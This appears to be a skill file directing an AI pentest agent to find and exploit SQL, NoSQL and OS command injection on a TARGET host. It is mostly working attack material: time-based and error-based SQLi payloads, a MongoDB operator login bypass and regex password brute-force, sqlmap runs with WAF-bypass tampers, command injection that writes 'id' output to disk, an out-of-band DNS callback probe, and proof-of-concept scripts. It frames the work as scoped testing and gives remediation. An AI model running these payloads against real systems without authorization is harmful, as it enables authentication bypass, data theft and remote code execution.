injection-tester

Injection Tester

Execute injection vulnerability testing across three attack types: SQL injection (error-based, blind, time-based, UNION), NoSQL injection (MongoDB operator injection), and OS command injection (Unix and Windows). Covers GET/POST parameters, JSON bodies, HTTP headers, and GraphQL queries.

Workflow

Phase 1: Recon

1. Mount skill files:

   Read plugins/pentest/skills/common-appsec-patterns/SKILL.md
   Read plugins/pentest/skills/pentest/attacks/injection/sql-injection/sql-injection-quickstart.md
   Read plugins/pentest/skills/pentest/attacks/injection/nosql-injection/nosql-injection-quickstart.md
   Read plugins/pentest/skills/pentest/attacks/injection/command-injection/os-command-injection-quickstart.md
   Read plugins/pentest/skills/pentest/attacks/injection/sql-injection/payloads/basic.md
   

2. Identify injection surface from previous inventory if available:

   cat outputs/ENGAGEMENT/inventory/api-endpoints.json 2>/dev/null | \
     grep -E '"GET"|"POST"|"PUT"' | head -40
   cat outputs/ENGAGEMENT/analysis/api-endpoints.md 2>/dev/null | head -80
   

3. Probe the target for injectable parameters directly:

   # Collect URLs with query parameters (historical + crawl)
   gau TARGET 2>/dev/null | grep '?' | sort -u \
     | tee outputs/ENGAGEMENT/activity/injection-urls-TARGET.txt
   waybackurls TARGET 2>/dev/null | grep '?' | sort -u \
     >> outputs/ENGAGEMENT/activity/injection-urls-TARGET.txt
   

4. Identify technology stack clues (determines injection type priority):

   curl -sI https://TARGET/ 2>&1 | grep -iE 'server|x-powered-by|x-aspnet|x-runtime' \
     | tee outputs/ENGAGEMENT/activity/injection-stack-fingerprint.txt
   

   • PHP/MySQL/MariaDB/MSSQL/PostgreSQL/Oracle → SQLi is primary
   • Node.js/Express/MongoDB → NoSQLi is primary
   • Any backend with user input passed to shell commands → CMDi possible
5. Log:

   {"timestamp":"...","agent":"injection-tester","action":"recon","target":"https://TARGET","injectable_params_found":12,"stack":"node+mongodb","priority":["nosql","cmdi","sql"]}
   

Phase 2: Experiment

SQLi Baseline Probes:

For each GET parameter identified:

# Error-based probe: single quote to trigger SQL syntax error
curl -s "https://TARGET/search?q='" 2>&1 \
  | grep -iE 'sql|syntax|error|mysql|mssql|ora-|sqlite|postgresql|pg_query' \
  | tee outputs/ENGAGEMENT/activity/sqli-error-probe-TARGET.txt

# Time-based blind probe: sleep 5 seconds if vulnerable
time_result=$(curl -s -o /dev/null -w "%{time_total}" \
  "https://TARGET/search?q=1';SELECT+SLEEP(5)--" 2>&1)
echo "Time-based probe result: ${time_result}s" \
  | tee outputs/ENGAGEMENT/activity/sqli-time-probe-TARGET.txt
# If time_result > 5 → likely vulnerable to blind SQLi

For POST parameters:

curl -s -X POST https://TARGET/login \
  -d "username=admin'--&password=x" 2>&1 \
  | grep -iE 'sql|syntax|error|mysql|mssql' \
  | tee outputs/ENGAGEMENT/activity/sqli-post-probe-TARGET.txt

NoSQLi Baseline Probes:

For MongoDB/Node.js applications, inject operators in JSON bodies:

# Operator injection: $gt operator to bypass comparison
curl -s -X POST https://TARGET/api/login \
  -H 'Content-Type: application/json' \
  -d '{"username": {"$gt": ""}, "password": {"$gt": ""}}' \
  -w "\nHTTP_STATUS:%{http_code}" 2>&1 \
  | tee outputs/ENGAGEMENT/activity/nosqli-operator-probe-TARGET.txt

# Regex injection: $regex to match any password
curl -s -X POST https://TARGET/api/login \
  -H 'Content-Type: application/json' \
  -d '{"username": "admin", "password": {"$regex": ".*"}}' \
  -w "\nHTTP_STATUS:%{http_code}" 2>&1 \
  | tee outputs/ENGAGEMENT/activity/nosqli-regex-probe-TARGET.txt

If HTTP 200 with successful login response → NoSQLi confirmed.

CMDi Baseline Probes:

For endpoints that appear to execute system commands (file conversion, DNS lookup, ping, report generation):

# Time-based CMDi probe (Unix)
time_result=$(curl -s -o /dev/null -w "%{time_total}" \
  -d "host=127.0.0.1;sleep+5" https://TARGET/ping 2>&1)
echo "CMDi time probe: ${time_result}s" \
  | tee outputs/ENGAGEMENT/activity/cmdi-time-probe-TARGET.txt

# Out-of-band CMDi probe using DNS callback
curl -s -d "host=127.0.0.1;nslookup+BURP_COLLABORATOR_HOST" \
  https://TARGET/ping -w "\nHTTP_STATUS:%{http_code}" 2>&1 \
  | tee outputs/ENGAGEMENT/activity/cmdi-oob-probe-TARGET.txt

Log each probe:

{"timestamp":"...","agent":"injection-tester","action":"experiment","type":"sqli","param":"q","probe":"single-quote","result":"error-in-response","error":"You have an error in your SQL syntax"}
{"timestamp":"...","agent":"injection-tester","action":"experiment","type":"nosqli","endpoint":"POST /api/login","payload":"{\"$gt\":\"\"}","result":"login-success","http_status":200}

Phase 3: Test

SQLi — Run sqlmap for automated confirmation and extraction:

# On confirmed SQLi parameter
sqlmap -u "https://TARGET/search?q=FUZZ" \
  --batch \
  --level=3 \
  --risk=2 \
  --output-dir=outputs/ENGAGEMENT/activity/sqlmap-TARGET/ \
  2>&1 | tee outputs/ENGAGEMENT/activity/sqlmap-run-TARGET.txt

For POST parameters:

sqlmap -u "https://TARGET/login" \
  --data="username=admin&password=x" \
  --batch --level=3 --risk=2 \
  --output-dir=outputs/ENGAGEMENT/activity/sqlmap-post-TARGET/ \
  2>&1 | tee outputs/ENGAGEMENT/activity/sqlmap-post-run-TARGET.txt

If WAF detected, load bypass payloads:

Read plugins/pentest/skills/pentest/attacks/injection/sql-injection/payloads/bypass.md

Then add tamper scripts:

sqlmap -u "https://TARGET/search?q=FUZZ" \
  --batch --level=3 --risk=2 \
  --tamper=space2comment,between,randomcase \
  --output-dir=outputs/ENGAGEMENT/activity/sqlmap-bypass-TARGET/ \
  2>&1

NoSQLi — Escalate to data extraction if login bypass confirmed:

# Attempt to enumerate users via $regex
Read plugins/pentest/skills/pentest/attacks/injection/nosql-injection/payloads/bypass.md
# Try regex brute-force of password
curl -s -X POST https://TARGET/api/login \
  -H 'Content-Type: application/json' \
  -d '{"username": "admin", "password": {"$regex": "^a"}}' \
  -w "\nHTTP_STATUS:%{http_code}" 2>&1 \
  | tee outputs/ENGAGEMENT/activity/nosqli-exfil-TARGET.txt

CMDi — Escalate to confirmed command execution:

Read plugins/pentest/skills/pentest/attacks/injection/command-injection/payloads/unix.md
# Confirm execution: write a file and retrieve it
curl -s -d "host=127.0.0.1;id+>+/tmp/cmdi-proof.txt" https://TARGET/ping 2>&1
curl -s https://TARGET/tmp/cmdi-proof.txt 2>&1 \
  | tee outputs/ENGAGEMENT/activity/cmdi-execution-proof-TARGET.txt

Log:

{"timestamp":"...","agent":"injection-tester","action":"test","type":"sqli","tool":"sqlmap","technique":"UNION","database":"MySQL 8.0","tables_found":["users","sessions","products"]}
{"timestamp":"...","agent":"injection-tester","action":"test","type":"cmdi","payload":"id","output":"uid=33(www-data) gid=33(www-data)","result":"confirmed"}

Phase 4: Verify

For each confirmed injection finding:

1. Create poc.py demonstrating the vulnerability:

   For SQLi:

   import requests
   url = "https://TARGET/search"
   # Time-based blind SQLi PoC
   params = {"q": "1';SELECT SLEEP(5)--"}
   import time
   start = time.time()
   r = requests.get(url, params=params, timeout=15)
   elapsed = time.time() - start
   assert elapsed > 4, f"No delay detected (elapsed: {elapsed:.1f}s)"
   print(f"VULNERABLE: time-based SQLi confirmed (delay: {elapsed:.1f}s)")
   

   For NoSQLi:

   import requests, json
   url = "https://TARGET/api/login"
   payload = {"username": {"$gt": ""}, "password": {"$gt": ""}}
   r = requests.post(url, json=payload)
   assert r.status_code == 200 and 'token' in r.text, "NoSQLi bypass failed"
   print(f"VULNERABLE: NoSQLi operator injection confirmed (HTTP {r.status_code})")
   

   For CMDi:

   import requests, time
   url = "https://TARGET/ping"
   payload = {"host": "127.0.0.1;sleep 5"}
   start = time.time()
   r = requests.post(url, data=payload, timeout=15)
   elapsed = time.time() - start
   assert elapsed > 4, f"No delay detected (elapsed: {elapsed:.1f}s)"
   print(f"VULNERABLE: CMDi time-based confirmed (delay: {elapsed:.1f}s)")
   

   Write to: outputs/ENGAGEMENT/findings/finding-NNN/poc.py

2. Execute poc.py and capture output:

   python outputs/ENGAGEMENT/findings/finding-NNN/poc.py \
     > outputs/ENGAGEMENT/findings/finding-NNN/poc_output.txt 2>&1
   

3. Save evidence:

   • HTTP request with payload → outputs/ENGAGEMENT/findings/finding-NNN/evidence/request.txt
   • Server response → outputs/ENGAGEMENT/findings/finding-NNN/evidence/response.txt

4. Write outputs/ENGAGEMENT/findings/finding-NNN/description.md:

   • Vulnerability type (SQLi / NoSQLi / CMDi)
   • Injection type (error-based, blind, time-based, operator injection, command injection)
   • Affected endpoint and parameter
   • Database/technology confirmed (if extracted)
   • CWE references: SQLi = CWE-89, NoSQLi = CWE-943, CMDi = CWE-78
   • CVSS estimate and impact (data breach, RCE, authentication bypass)
   • Remediation: parameterized queries (SQLi), input validation + whitelisting (CMDi), ORM with typed queries (NoSQLi)

5. Write outputs/ENGAGEMENT/findings/finding-NNN/workflow.md — manual reproduction steps.

6. Log confirmation:

   {"timestamp":"...","agent":"injection-tester","action":"verify","finding":"finding-001","type":"sqli","technique":"time-based-blind","param":"q","poc_executed":true,"result":"confirmed"}
   

Key Commands

SQLi probing:

curl -s "https://TARGET/search?q='" | grep -i 'sql\|syntax\|error'
time curl -s "https://TARGET/search?q=1';SELECT+SLEEP(5)--" -o /dev/null
sqlmap -u "https://TARGET/search?q=FUZZ" --batch --level=3 --risk=2

NoSQLi probing:

curl -X POST https://TARGET/api/login -H 'Content-Type: application/json' \
  -d '{"username":{"$gt":""},"password":{"$gt":""}}' -w "\n%{http_code}"

CMDi probing:

time curl -s -d "host=127.0.0.1;sleep+5" https://TARGET/ping -o /dev/null
curl -s -d "host=127.0.0.1;id" https://TARGET/ping

Output Structure

outputs/{engagement}/
├── activity/injection-tester.log                 # NDJSON activity log (outputs/{engagement}/activity/)
├── activity/injection-urls-{target}.txt          # URLs with parameters (gau+wayback)
├── activity/injection-stack-fingerprint.txt      # Technology stack headers
├── activity/sqli-error-probe-{target}.txt        # SQLi error-based probe output
├── activity/sqli-time-probe-{target}.txt         # SQLi time-based probe timing
├── activity/sqli-post-probe-{target}.txt         # SQLi POST parameter probe
├── activity/nosqli-operator-probe-{target}.txt   # NoSQLi $gt operator probe
├── activity/nosqli-regex-probe-{target}.txt      # NoSQLi $regex probe
├── activity/cmdi-time-probe-{target}.txt         # CMDi time-based probe timing
├── activity/sqlmap-{target}/                     # sqlmap output directory
└── findings/finding-{NNN}/
    ├── description.md                            # Vuln type, CWE, CVSS, remediation
    ├── poc.py                                    # Python requests PoC
    ├── poc_output.txt                            # poc.py execution output
    ├── workflow.md                               # Manual reproduction steps
    └── evidence/
        ├── request.txt                           # HTTP request with payload
        └── response.txt                          # Server response or timing evidence

Critical Rules

• Scope is SQLi + NoSQLi + CMDi ONLY. Do not test SSTI, XXE, LDAP, or other injection types here.
• Use sqlmap for SQLi automation — do not hand-roll a full payload enumeration loop.
• No theoretical findings — poc.py must execute successfully before writing description.md.
• For CMDi: time-based blind confirmation is sufficient PoC; do not attempt RCE escalation unless explicitly in scope.
• Document negative results: if no injection found after full testing, log the result.
• Never write to inventory/ or analysis/ — this is an exploitation agent.